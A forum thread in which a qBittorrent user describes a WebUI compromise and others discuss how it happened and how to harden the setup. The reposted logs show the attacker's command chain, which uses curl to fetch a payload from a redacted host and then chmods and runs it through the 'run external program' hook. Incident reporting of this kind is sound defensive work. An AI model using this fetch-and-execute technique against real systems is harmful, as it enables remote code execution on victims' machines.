WebUI login without password exploit

Linux specific questions, problems.
Post Reply
katiedaydream

WebUI login without password exploit

Post by katiedaydream »

Hi all,

So I had my home server's qbittorrent (4.3.5) WebUI exposed externally through UPnP, cause I'm careless, and it got exploited. I'm kind of lost as to why though, the logs only provide enough detail to show that they were able to login directly without brute forcing a password, as there had been no failed logins. I did grep through all the logs.

Exploit went as follows:
1. Successful login from external IP... Somehow...
2. Remove all existing torrents (yay for backed up .torrent files)
3. change "Run external program on torrent completion" to a curl command that downloaded a payload, then add a dummy torrent
4. change external command to chmod 777 the payload, remove and re-add the torrent
5. change external command to the payload itself, remove and re-add

Also they changed the WebUI password just to be a shit.

I'm not exceptionally dumb, and my qbittorrent was not running elevated. I also got lucky; even if it contained some privilege escalation exploit the payload was x86 and I'm running on ARM.

Still kind of concerning that there's some exploit to login without needing the password, since there are many users that access without an ssh tunnel, as that is the default config.
Worth noting maybe is that I have authentication bypassed for the 192.168.1.0/24 subnet, but the connection was from an external IP anyways.

I've redacted some stuff in the log, mainly so nobody goes and downloads the payload themself. If you are skilled in reverse engineering binaries and want to dig into the payload let me know. I'm going to try myself when I have some time anyways, but I'm kinda bad at it.

qbittorrent.log

Code: Select all

(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/21903
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: UDP/21903
(I) 2021-11-13T07:15:04 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/8080
(N) 2021-11-13T07:37:04 - WebAPI login success. IP: ::ffff:(redacted external ip)
(N) 2021-11-13T07:37:05 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:05 - '(redacted torrent)' was removed from the transfer list.
...
(every torrent gets removed)
...
(N) 2021-11-13T07:37:06 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:22 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: curl http://(redacted ip):8000/i386 --output /tmp/t
(N) 2021-11-13T07:37:27 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:27 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:28 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:29 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: chmod 777 /tmp/t
(N) 2021-11-13T07:37:49 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:49 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:50 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:52 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: /tmp/t
readelf -h /tmp/t

Code: Select all

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x80a7020
  Start of program headers:          52 (bytes into file)
  Start of section headers:          276 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         7
  Size of section headers:           40 (bytes)
  Number of section headers:         14
  Section header string table index: 3
User avatar
Peter
Administrator
Administrator
Posts: 2693
Joined: Wed Jul 07, 2010 6:14 pm

Re: WebUI login without password exploit

Post by Peter »

Hmm, that is extremely interesting...

I am not sure about the exact changes since 4.3.5 but 4.3.9 has a LOT of security options for WebUI.
You can try posting this over here as well: https://github.com/qbittorrent/qBittorrent/issues

Though I am not sure if there is anything to investigate, minus the payload.
- Check the IP, hostname
- Check when the hack happened (timezones, etc)
- Usually, you can simply use a tool to identify a program's compiler, then find a decompiler. I doubt these "hackers" would actually be able to code a proper application.
GlitterTile

Re: WebUI login without password exploit

Post by GlitterTile »

I noticed some parts of your setup are easily guessed. IP Range: 192.168.1.0/24 Port:8080
Also you said login to the WebUI is not required when accessed locally.

We may never know how they got in, but one theory I have is that you visited a site (perhaps one that attracts torrent users) that had an iframe which accessed your local qbitorrent webui by attempting 192.168.0.1:8080 through to 192.168.1.255:8080. As this is internal it does not require login. This would change the login credentials for the webui. The website with this code would already know your external IP so could easily connect to the same external IP on common ports such as 8080 attempting the new login credentials.

I would imagine a setup like this on a torrent site would be frequently successful.

If this is the case then requiring login internally would end this, additionally using a random port would make this harder.

Is it possible you can check any logs for sites you were visiting at the time you were attacked?

I would also think it would be wise for qbittorrent to have the option to execute external programs disabled by default and only possible to be enabled externally (e.g. config file) as this feature is so dangerous.
katiedaydream

Re: WebUI login without password exploit

Post by katiedaydream »

@GlitterTile's suggestion seems more likely than there being an exploit honestly, but I can't confirm whether that's the case either.
I don't keep logs of network traffic, and I have roommates, so that's not really something I can rule out. Although at least my own browsing history seems clean and I would have been the only one awake at the time. Still, the breach could have happened earlier.

FWIW one roommate had a public facing Nextcloud server that I looked through the logs of. There was an access from the attacker's IP around the same time, but it seemed to just be an attempt at an exploit using some junk HTTP headers, all of which apache rejected with 400s.

I can't confirm that they accessed it through the local side first, since it looks like qbit doesn't log accesses from the whitelisted subnet.

I'd rather not throw an issue up when I don't have a reproducible bug to report. But I agree maybe there could be something done about the ease of code execution. I'll make a post.

As for the payload, the full elf headers make it clear it was written in go. For which no decompiler exists, but there's always generic x86 disassembly.
katiedaydream

Re: WebUI login without password exploit

Post by katiedaydream »

Well this is pretty depressing... I'm definitely not well versed enough to figure out exactly what the payload is supposed to do, but it does seem to be built to spam a bunch of hateful emails about a handful of people. So not even something it would have needed root for.
One email was pretty personally hurtful, since I happen to belong to the targeted minority. So that's me emotionally wrecked for the night.
oof666ohno

Re: WebUI login without password exploit

Post by oof666ohno »

This issue is still ongoing and affecting also Transmission and Deluge torrent clients.

I did not even have local side whitelisted. There was no failed login attempts and I didn't have ports forwarded in my router.

https://www.reddit.com/r/truenas/commen ... nt_plugin/
https://www.reddit.com/r/qBittorrent/co ... nts_added/
https://community.synology.com/enu/forum/1/post/151239
https://forum.transmissionbt.com/viewto ... 8649b1bbb4
User avatar
Peter
Administrator
Administrator
Posts: 2693
Joined: Wed Jul 07, 2010 6:14 pm

Re: WebUI login without password exploit

Post by Peter »

If anyone has info on this or this happened to them, please check the Github Issue Tracker and comment/open a ticket.
Please double-check if there is an existing ticket about this.
Thank you!

https://github.com/qbittorrent/qBittorrent/issues
Post Reply